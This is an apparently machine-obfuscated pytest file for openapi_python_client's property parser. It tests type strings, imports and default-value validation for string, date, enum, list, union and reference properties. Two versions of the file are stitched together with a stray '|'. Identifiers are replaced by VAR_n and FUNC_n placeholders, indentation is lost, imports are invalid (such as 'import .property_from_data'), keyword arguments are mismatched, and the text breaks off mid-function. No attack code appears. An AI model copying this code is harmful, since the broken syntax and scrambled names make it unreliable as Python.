def FUNC_17(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema(anyOf=[{}])
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
assert VAR_4 == PropertyError(detail=f"Invalid property in union {VAR_5}", VAR_23=oai.Schema())
def FUNC_18(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type=VAR_1.MagicMock())
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import .property_from_data
assert property_from_data(VAR_5=name, VAR_26=required, VAR_23=data) == PropertyError(
VAR_23=data, detail=f"unknown type {VAR_23.type}"
)
def FUNC_19(self):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import .property_from_data
VAR_23 = oai.Schema()
assert property_from_data(VAR_5="blah", VAR_26=True, VAR_23=data) == PropertyError(
VAR_23=data, detail="Schemas must either have one of enum, anyOf, or type defined."
)
class CLASS_11:
def FUNC_20(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string")
VAR_35 = VAR_1.patch(f"{VAR_0}.StringProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_4 = VAR_29(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_35.assert_called_once_with(VAR_5=name, VAR_26=required, pattern=None, default=None)
assert VAR_4 == VAR_35.return_value
VAR_35.reset_mock()
VAR_23.default = VAR_1.MagicMock()
VAR_23.pattern = VAR_1.MagicMock()
VAR_29(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_35.assert_called_once_with(VAR_5=name, VAR_26=required, pattern=VAR_23.pattern, default=VAR_23.default)
def FUNC_21(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string", schema_format="date-time")
VAR_36 = VAR_1.patch(f"{VAR_0}.DateTimeProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_4 = VAR_29(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_36.assert_called_once_with(VAR_5=name, VAR_26=required, default=None)
assert VAR_4 == VAR_36.return_value
VAR_36.reset_mock()
VAR_23.default = VAR_1.MagicMock()
VAR_29(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_36.assert_called_once_with(VAR_5=name, VAR_26=required, default=VAR_23.default)
def FUNC_22(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string", schema_format="date")
VAR_37 = VAR_1.patch(f"{VAR_0}.DateProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_4 = VAR_29(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_37.assert_called_once_with(VAR_5=name, VAR_26=required, default=None)
assert VAR_4 == VAR_37.return_value
VAR_37.reset_mock()
VAR_23.default = VAR_1.MagicMock()
VAR_29(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_37.assert_called_once_with(VAR_5=name, VAR_26=required, default=VAR_23.default)
def FUNC_23(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string", schema_format="binary")
VAR_38 = VAR_1.patch(f"{VAR_0}.FileProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_4 = VAR_29(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_38.assert_called_once_with(VAR_5=name, VAR_26=required, default=None)
assert VAR_4 == VAR_38.return_value
VAR_38.reset_mock()
VAR_23.default = VAR_1.MagicMock()
VAR_29(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_38.assert_called_once_with(VAR_5=name, VAR_26=required, default=VAR_23.default)
def FUNC_24(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string", schema_format=VAR_1.MagicMock())
VAR_35 = VAR_1.patch(f"{VAR_0}.StringProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_4 = VAR_29(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_35.assert_called_once_with(VAR_5=name, VAR_26=required, pattern=None, default=None)
assert VAR_4 == VAR_35.return_value
VAR_35.reset_mock()
VAR_23.default = VAR_1.MagicMock()
VAR_23.pattern = VAR_1.MagicMock()
VAR_29(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_35.assert_called_once_with(VAR_5=name, VAR_26=required, pattern=VAR_23.pattern, default=VAR_23.default)
| from datetime import date, datetime
import .pytest
import openapi_python_client.schema as oai
from openapi_python_client.parser.errors import PropertyError, ValidationError
from openapi_python_client.parser.reference import Reference
VAR_0 = "openapi_python_client.parser.properties"
class CLASS_0:
def FUNC_0(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_4 = VAR_1.patch(f"{VAR_0}.Property._validate_default")
Property(VAR_6="a name", VAR_27=True, default=None)
VAR_4.assert_not_called()
Property(VAR_6="a name", VAR_27=True, default="the default value")
VAR_4.assert_called_with(default="the default value")
def FUNC_1(self):
from openapi_python_client.parser.properties import Property
VAR_5 = Property(VAR_6="test", VAR_27=True, default=None)
VAR_5._type_string = "TestType"
assert VAR_5.get_type_string() == "TestType"
VAR_5.required = False
assert VAR_5.get_type_string() == "Optional[TestType]"
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_6 = VAR_1.MagicMock()
VAR_7 = VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_5 = Property(VAR_6=name, VAR_27=True, default=None)
VAR_8 = VAR_1.patch.object(VAR_5, "get_type_string")
assert VAR_5.to_string() == f"{VAR_7(VAR_6)}: {VAR_8()}"
VAR_5.required = False
assert VAR_5.to_string() == f"{VAR_7(VAR_6)}: {VAR_8()} = None"
VAR_5.default = "TEST"
assert VAR_5.to_string() == f"{VAR_7(VAR_6)}: {VAR_8()} = TEST"
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_6 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_5 = Property(VAR_6=name, VAR_27=True, default=None)
assert VAR_5.get_imports(VAR_9="") == set()
VAR_5.required = False
assert VAR_5.get_imports(VAR_9="") == {"from typing import Optional"}
def FUNC_4(self):
from openapi_python_client.parser.properties import Property
VAR_5 = Property(VAR_6="a name", VAR_27=True, default=None)
with pytest.raises(ValidationError):
VAR_5._validate_default("a default value")
with pytest.raises(ValidationError):
VAR_5 = Property(VAR_6="a name", VAR_27=True, default="")
class CLASS_1:
def FUNC_1(self):
from openapi_python_client.parser.properties import .StringProperty
VAR_5 = VAR_36(VAR_6="test", VAR_27=True, default=None)
assert VAR_5.get_type_string() == "str"
VAR_5.required = False
assert VAR_5.get_type_string() == "Optional[str]"
def FUNC_4(self):
from openapi_python_client.parser.properties import .StringProperty
VAR_5 = VAR_36(VAR_6="a name", VAR_27=True, default="the default value")
assert VAR_5.default == '"the default value"'
class CLASS_2:
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import .DateTimeProperty
VAR_6 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_5 = VAR_37(VAR_6=name, VAR_27=True, default=None)
assert VAR_5.get_imports(VAR_9="") == {
"import datetime",
"from typing import cast",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9="") == {
"from typing import Optional",
"import datetime",
"from typing import cast",
}
def FUNC_4(self):
from openapi_python_client.parser.properties import .DateTimeProperty
with pytest.raises(ValidationError):
VAR_5 = VAR_37(VAR_6="a name", VAR_27=True, default="not a datetime")
VAR_5 = VAR_37(VAR_6="a name", VAR_27=True, default="2017-07-21T17:32:28Z")
assert VAR_5.default == "datetime.datetime(2017, 7, 21, 17, 32, 28, tzinfo=datetime.timezone.utc)"
class CLASS_3:
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import .DateProperty
VAR_6 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_5 = VAR_38(VAR_6=name, VAR_27=True, default=None)
assert VAR_5.get_imports(VAR_9="") == {
"import datetime",
"from typing import cast",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9="") == {
"from typing import Optional",
"import datetime",
"from typing import cast",
}
def FUNC_4(self):
from openapi_python_client.parser.properties import .DateProperty
with pytest.raises(ValidationError):
VAR_5 = VAR_38(VAR_6="a name", VAR_27=True, default="not a date")
VAR_5 = VAR_38(VAR_6="a name", VAR_27=True, default="1010-10-10")
assert VAR_5.default == "datetime.date(1010, 10, 10)"
class CLASS_4:
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import .FileProperty
VAR_6 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_9 = "blah"
VAR_5 = VAR_39(VAR_6=name, VAR_27=True, default=None)
assert VAR_5.get_imports(VAR_9=prefix) == {f"from {VAR_9}.types import File", "from dataclasses import astuple"}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9=prefix) == {
"from typing import Optional",
f"from {VAR_9}.types import File",
"from dataclasses import astuple",
}
def FUNC_4(self):
from openapi_python_client.parser.properties import .FileProperty
VAR_5 = VAR_39(VAR_6="a name", VAR_27=True, default=None)
with pytest.raises(ValidationError):
VAR_5 = VAR_39(VAR_6="a name", VAR_27=True, default="")
class CLASS_5:
def FUNC_4(self):
from openapi_python_client.parser.properties import .FloatProperty
VAR_5 = VAR_33(VAR_6="a name", VAR_27=True, default=None)
VAR_5 = VAR_33(VAR_6="a name", VAR_27=True, default="123.123")
assert VAR_5.default == 123.123
with pytest.raises(ValidationError):
VAR_5 = VAR_33(VAR_6="a name", VAR_27=True, default="not a float")
class CLASS_6:
def FUNC_4(self):
from openapi_python_client.parser.properties import .IntProperty
VAR_5 = VAR_35(VAR_6="a name", VAR_27=True, default=None)
VAR_5 = VAR_35(VAR_6="a name", VAR_27=True, default="123")
assert VAR_5.default == 123
with pytest.raises(ValidationError):
VAR_5 = VAR_35(VAR_6="a name", VAR_27=True, default="not an int")
class CLASS_7:
def FUNC_4(self):
from openapi_python_client.parser.properties import BooleanProperty
VAR_5 = BooleanProperty(VAR_6="a name", VAR_27=True, default=None)
VAR_5 = BooleanProperty(VAR_6="a name", VAR_27=True, default="Literally anything will work")
assert VAR_5.default == True
class CLASS_8:
def FUNC_1(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty
VAR_10 = VAR_1.MagicMock()
VAR_11 = VAR_1.MagicMock()
VAR_10.get_type_string.return_value = VAR_11
VAR_5 = VAR_32(VAR_6="test", VAR_27=True, default=None, VAR_10=inner_property)
assert VAR_5.get_type_string() == f"List[{VAR_11}]"
VAR_5.required = False
assert VAR_5.get_type_string() == f"Optional[List[{VAR_11}]]"
VAR_5 = VAR_32(VAR_6="test", VAR_27=True, default=[], VAR_10=inner_property)
assert VAR_5.default == f"field(default_factory=lambda: cast(List[{VAR_11}], []))"
def FUNC_5(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty
VAR_10 = VAR_1.MagicMock()
VAR_12 = VAR_1.MagicMock()
VAR_10.get_imports.return_value = {VAR_12}
VAR_9 = VAR_1.MagicMock()
VAR_5 = VAR_32(VAR_6="test", VAR_27=True, default=None, VAR_10=inner_property)
assert VAR_5.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import List",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import List",
"from typing import Optional",
}
VAR_5.default = VAR_1.MagicMock()
assert VAR_5.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import Optional",
"from typing import List",
"from typing import cast",
"from dataclasses import field",
}
def FUNC_4(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty
VAR_10 = VAR_1.MagicMock()
VAR_11 = VAR_1.MagicMock()
VAR_10.get_type_string.return_value = VAR_11
VAR_10._validate_default.return_value = "y"
VAR_5 = VAR_32(VAR_6="a name", VAR_27=True, default=["x"], VAR_10=inner_property)
assert VAR_5.default == f"field(default_factory=lambda: cast(List[{VAR_11}], ['y']))"
with pytest.raises(ValidationError):
VAR_5 = VAR_32(VAR_6="a name", VAR_27=True, default="x", VAR_10=inner_property)
def FUNC_6(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty, VAR_29
VAR_13 = VAR_1.MagicMock(spec=VAR_29)
VAR_13.get_type_string.return_value = "AnEnum"
VAR_13._validate_default.return_value = "AnEnum.val1"
VAR_5 = VAR_32(VAR_6="a name", VAR_27=True, default=["val1"], VAR_10=VAR_13)
assert VAR_5.default == f"field(default_factory=lambda: cast(List[AnEnum], [AnEnum.val1]))"
class CLASS_9:
def FUNC_1(self, VAR_1):
from openapi_python_client.parser.properties import .UnionProperty
VAR_14 = VAR_1.MagicMock()
VAR_14.get_type_string.return_value = "inner_type_string_1"
VAR_15 = VAR_1.MagicMock()
VAR_15.get_type_string.return_value = "inner_type_string_2"
VAR_5 = VAR_34(
VAR_6="test", VAR_27=True, default=None, inner_properties=[VAR_14, VAR_15]
)
assert VAR_5.get_type_string() == "Union[inner_type_string_1, inner_type_string_2]"
VAR_5.required = False
assert VAR_5.get_type_string() == "Optional[Union[inner_type_string_1, inner_type_string_2]]"
def FUNC_5(self, VAR_1):
from openapi_python_client.parser.properties import .UnionProperty
VAR_14 = VAR_1.MagicMock()
VAR_16 = VAR_1.MagicMock()
VAR_14.get_imports.return_value = {VAR_16}
VAR_15 = VAR_1.MagicMock()
VAR_17 = VAR_1.MagicMock()
VAR_15.get_imports.return_value = {VAR_17}
VAR_9 = VAR_1.MagicMock()
VAR_5 = VAR_34(
VAR_6="test", VAR_27=True, default=None, inner_properties=[VAR_14, VAR_15]
)
assert VAR_5.get_imports(VAR_9=prefix) == {
VAR_16,
VAR_17,
"from typing import Union",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9=prefix) == {
VAR_16,
VAR_17,
"from typing import Union",
"from typing import Optional",
}
def FUNC_4(self, VAR_1):
from openapi_python_client.parser.properties import .UnionProperty
VAR_14 = VAR_1.MagicMock()
VAR_14.get_type_string.return_value = "inner_type_string_1"
VAR_14._validate_default.side_effect = ValidationError()
VAR_15 = VAR_1.MagicMock()
VAR_15.get_type_string.return_value = "inner_type_string_2"
VAR_15._validate_default.return_value = "the default value"
VAR_5 = VAR_34(
VAR_6="test", VAR_27=True, default="a value", inner_properties=[VAR_14, VAR_15]
)
assert VAR_5.default == "the default value"
VAR_15._validate_default.side_effect = ValidationError()
with pytest.raises(ValidationError):
VAR_5 = VAR_34(
VAR_6="test", VAR_27=True, default="a value", inner_properties=[VAR_14, VAR_15]
)
class CLASS_10:
def test___post_init__(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_7 = VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_18 = VAR_1.MagicMock(class_name="MyTestEnum")
VAR_19 = VAR_1.MagicMock(class_name="Deduped")
VAR_20 = VAR_1.patch(
f"{VAR_0}.Reference.from_ref", side_effect=[VAR_18, VAR_19, deduped_reference]
)
from openapi_python_client.parser import .properties
VAR_21 = VAR_1.MagicMock()
properties._existing_enums = {"MyTestEnum": VAR_21}
VAR_22 = {"FIRST": "first", "SECOND": "second"}
VAR_23 = properties.EnumProperty(
VAR_6=name, VAR_27=True, default="second", VAR_22=values, title="a_title",
)
assert VAR_23.default == "Deduped.SECOND"
assert VAR_23.python_name == VAR_7(VAR_6)
VAR_20.assert_has_calls([VAR_1.call("a_title"), VAR_1.call("MyTestEnum1")])
assert VAR_23.reference == VAR_19
assert properties._existing_enums == {"MyTestEnum": VAR_21, "Deduped": VAR_23}
assert (
properties.EnumProperty(VAR_6=name, VAR_27=True, default="second", VAR_22=values, title="a_title",)
== VAR_23
)
assert properties._existing_enums == {"MyTestEnum": VAR_21, "Deduped": VAR_23}
VAR_21.values = VAR_22
VAR_20.reset_mock()
VAR_20.side_effect = [VAR_18]
VAR_23 = properties.EnumProperty(
VAR_6=name, VAR_27=True, default="second", VAR_22=values, title="a_title",
)
assert VAR_23.default == "MyTestEnum.SECOND"
assert VAR_23.python_name == VAR_7(VAR_6)
VAR_20.assert_called_once_with("a_title")
assert VAR_23.reference == VAR_18
assert len(properties._existing_enums) == 2
properties._existing_enums = {}
def FUNC_1(self, VAR_1):
VAR_18 = VAR_1.MagicMock(class_name="MyTestEnum")
VAR_1.patch(f"{VAR_0}.Reference.from_ref", return_value=VAR_18)
from openapi_python_client.parser import .properties
VAR_23 = properties.EnumProperty(VAR_6="test", VAR_27=True, default=None, VAR_22={}, title="a_title")
assert VAR_23.get_type_string() == "MyTestEnum"
VAR_23.required = False
assert VAR_23.get_type_string() == "Optional[MyTestEnum]"
properties._existing_enums = {}
def FUNC_3(self, VAR_1):
VAR_18 = VAR_1.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
VAR_1.patch(f"{VAR_0}.Reference.from_ref", return_value=VAR_18)
VAR_9 = VAR_1.MagicMock()
from openapi_python_client.parser import .properties
VAR_23 = properties.EnumProperty(VAR_6="test", VAR_27=True, default=None, VAR_22={}, title="a_title")
assert VAR_23.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_18.module_name} import {VAR_18.class_name}"
}
VAR_23.required = False
assert VAR_23.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_18.module_name} import {VAR_18.class_name}",
"from typing import Optional",
}
properties._existing_enums = {}
def FUNC_7(self):
from openapi_python_client.parser.properties import .EnumProperty
VAR_24 = ["abc", "123", "a23", "1bc"]
VAR_25 = VAR_28.values_from_list(VAR_24)
assert VAR_25 == {
"ABC": "abc",
"VALUE_1": "123",
"A23": "a23",
"VALUE_3": "1bc",
}
def FUNC_8(self):
from openapi_python_client.parser.properties import .EnumProperty
VAR_24 = ["abc", "123", "a23", "abc"]
with pytest.raises(ValueError):
VAR_28.values_from_list(VAR_24)
def FUNC_9(self, VAR_1):
from openapi_python_client.parser import .properties
properties._existing_enums = VAR_1.MagicMock()
assert properties.EnumProperty.get_all_enums() == properties._existing_enums
properties._existing_enums = {}
def FUNC_10(self):
from openapi_python_client.parser import .properties
properties._existing_enums = {"test": "an enum"}
assert properties.EnumProperty.get_enum("test") == "an enum"
properties._existing_enums = {}
def FUNC_4(self, VAR_1):
VAR_18 = VAR_1.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
VAR_1.patch(f"{VAR_0}.Reference.from_ref", return_value=VAR_18)
from openapi_python_client.parser import .properties
VAR_23 = properties.EnumProperty(
VAR_6="test", VAR_27=True, default="test", VAR_22={"TEST": "test"}, title="a_title"
)
assert VAR_23.default == "MyTestEnum.TEST"
with pytest.raises(ValidationError):
VAR_23 = properties.EnumProperty(
VAR_6="test", VAR_27=True, default="bad_val", VAR_22={"TEST": "test"}, title="a_title"
)
properties._existing_enums = {}
class CLASS_11:
def FUNC_11(self, VAR_1):
from openapi_python_client.parser.properties import .RefProperty
VAR_26 = VAR_29(
VAR_6="test", VAR_27=True, default=None, reference=VAR_1.MagicMock(class_name="MyRefClass")
)
assert VAR_26.template == "ref_property.pyi"
VAR_1.patch(f"{VAR_0}.EnumProperty.get_enum", return_value="an enum")
assert VAR_26.template == "enum_property.pyi"
def FUNC_1(self, VAR_1):
from openapi_python_client.parser.properties import .RefProperty
VAR_26 = VAR_29(
VAR_6="test", VAR_27=True, default=None, reference=VAR_1.MagicMock(class_name="MyRefClass")
)
assert VAR_26.get_type_string() == "MyRefClass"
VAR_26.required = False
assert VAR_26.get_type_string() == "Optional[MyRefClass]"
def FUNC_3(self, VAR_1):
VAR_18 = VAR_1.MagicMock(class_name="MyRefClass", module_name="my_test_enum")
VAR_9 = VAR_1.MagicMock()
from openapi_python_client.parser.properties import .RefProperty
VAR_5 = VAR_29(VAR_6="test", VAR_27=True, default=None, reference=VAR_18)
assert VAR_5.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_18.module_name} import {VAR_18.class_name}",
"from typing import Dict",
"from typing import cast",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_18.module_name} import {VAR_18.class_name}",
"from typing import Dict",
"from typing import cast",
"from typing import Optional",
}
def FUNC_4(self, VAR_1):
from openapi_python_client.parser.properties import .RefProperty
with pytest.raises(ValidationError):
VAR_5 = VAR_29(VAR_6="a name", VAR_27=True, default="", reference=VAR_1.MagicMock())
VAR_23 = VAR_1.MagicMock()
VAR_23._validate_default.return_value = "val1"
VAR_1.patch(f"{VAR_0}.EnumProperty.get_enum", return_value=VAR_23)
VAR_5 = VAR_29(VAR_6="a name", VAR_27=True, default="", reference=VAR_1.MagicMock())
assert VAR_5.default == "val1"
class CLASS_12:
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import DictProperty
VAR_6 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_9 = VAR_1.MagicMock()
VAR_5 = DictProperty(VAR_6=name, VAR_27=True, default=None)
assert VAR_5.get_imports(VAR_9=prefix) == {
"from typing import Dict",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9=prefix) == {
"from typing import Optional",
"from typing import Dict",
}
VAR_5.default = VAR_1.MagicMock()
assert VAR_5.get_imports(VAR_9=prefix) == {
"from typing import Optional",
"from typing import Dict",
"from typing import cast",
"from dataclasses import field",
}
def FUNC_4(self):
from openapi_python_client.parser.properties import DictProperty
VAR_5 = DictProperty(VAR_6="a name", VAR_27=True, default={"key": "value"})
with pytest.raises(ValidationError):
VAR_5 = DictProperty(VAR_6="a name", VAR_27=True, default="not a dict")
class CLASS_13:
def FUNC_12(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = VAR_1.MagicMock(title=None)
VAR_28 = VAR_1.patch(f"{VAR_0}.EnumProperty")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_28.values_from_list.assert_called_once_with(VAR_24.enum)
VAR_28.assert_called_once_with(
VAR_6=name, VAR_27=required, VAR_22=VAR_28.values_from_list(), default=VAR_24.default, title=VAR_6
)
assert VAR_5 == VAR_28()
VAR_28.reset_mock()
VAR_24.title = VAR_1.MagicMock()
property_from_data(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_28.assert_called_once_with(
VAR_6=name, VAR_27=required, VAR_22=VAR_28.values_from_list(), default=VAR_24.default, title=VAR_24.title
)
def FUNC_13(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Reference.construct(ref=VAR_1.MagicMock())
VAR_20 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
VAR_29 = VAR_1.patch(f"{VAR_0}.RefProperty")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_20.assert_called_once_with(VAR_24.ref)
VAR_29.assert_called_once_with(VAR_6=name, VAR_27=required, reference=VAR_20(), default=None)
assert VAR_5 == VAR_29()
def FUNC_14(self, VAR_1):
VAR_30 = VAR_1.patch(f"{VAR_0}._string_based_property")
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
assert VAR_5 == VAR_30.return_value
VAR_30.assert_called_once_with(VAR_6=name, VAR_27=required, VAR_24=data)
@pytest.mark.parametrize(
"openapi_type,python_type",
[
("number", "FloatProperty"),
("integer", "IntProperty"),
("boolean", "BooleanProperty"),
("object", "DictProperty"),
],
)
def FUNC_15(self, VAR_1, VAR_2, VAR_3):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type=VAR_2)
VAR_31 = VAR_1.patch(f"{VAR_0}.{VAR_3}")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_31.assert_called_once_with(VAR_6=name, VAR_27=required, default=None)
assert VAR_5 == VAR_31()
VAR_31.reset_mock()
VAR_24.default = VAR_1.MagicMock()
property_from_data(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_31.assert_called_once_with(VAR_6=name, VAR_27=required, default=VAR_24.default)
def FUNC_16(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema(type="array", items={"type": "number", "default": "0.0"},)
VAR_32 = VAR_1.patch(f"{VAR_0}.ListProperty")
VAR_33 = VAR_1.patch(f"{VAR_0}.FloatProperty")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_33.assert_called_once_with(VAR_6=name, VAR_27=True, default="0.0")
VAR_32.assert_called_once_with(
VAR_6=name, VAR_27=required, default=None, VAR_10=VAR_33.return_value
)
assert VAR_5 == VAR_32.return_value
def FUNC_17(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema(type="array")
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
assert VAR_5 == PropertyError(VAR_24=data, detail="type array must have items defined")
def FUNC_18(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema(type="array", items={},)
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
assert VAR_5 == PropertyError(VAR_24=oai.Schema(), detail=f"invalid VAR_24 in items of array {VAR_6}")
def FUNC_19(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema(anyOf=[{"type": "number", "default": "0.0"}, {"type": "integer", "default": "0"},])
VAR_34 = VAR_1.patch(f"{VAR_0}.UnionProperty")
VAR_33 = VAR_1.patch(f"{VAR_0}.FloatProperty")
VAR_35 = VAR_1.patch(f"{VAR_0}.IntProperty")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_33.assert_called_once_with(VAR_6=name, VAR_27=required, default="0.0")
VAR_35.assert_called_once_with(VAR_6=name, VAR_27=required, default="0")
VAR_34.assert_called_once_with(
VAR_6=name,
VAR_27=required,
default=None,
inner_properties=[VAR_33.return_value, VAR_35.return_value],
)
assert VAR_5 == VAR_34.return_value
def FUNC_20(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema(anyOf=[{}])
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
assert VAR_5 == PropertyError(detail=f"Invalid property in union {VAR_6}", VAR_24=oai.Schema())
def FUNC_21(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type=VAR_1.MagicMock())
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import .property_from_data
assert property_from_data(VAR_6=name, VAR_27=required, VAR_24=data) == PropertyError(
VAR_24=data, detail=f"unknown type {VAR_24.type}"
)
def FUNC_22(self):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import .property_from_data
VAR_24 = oai.Schema()
assert property_from_data(VAR_6="blah", VAR_27=True, VAR_24=data) == PropertyError(
VAR_24=data, detail="Schemas must either have one of enum, anyOf, or type defined."
)
def FUNC_23(self, VAR_1):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import .property_from_data
VAR_1.patch(f"{VAR_0}._property_from_data").side_effect = ValidationError()
VAR_24 = oai.Schema()
assert property_from_data(VAR_6="blah", VAR_27=True, VAR_24=data) == PropertyError(
detail="Failed to validate default value", VAR_24=data
)
class CLASS_14:
def FUNC_24(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string")
VAR_36 = VAR_1.patch(f"{VAR_0}.StringProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_5 = VAR_30(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_36.assert_called_once_with(VAR_6=name, VAR_27=required, pattern=None, default=None)
assert VAR_5 == VAR_36.return_value
VAR_36.reset_mock()
VAR_24.default = VAR_1.MagicMock()
VAR_24.pattern = VAR_1.MagicMock()
VAR_30(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_36.assert_called_once_with(VAR_6=name, VAR_27=required, pattern=VAR_24.pattern, default=VAR_24.default)
def FUNC_25(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
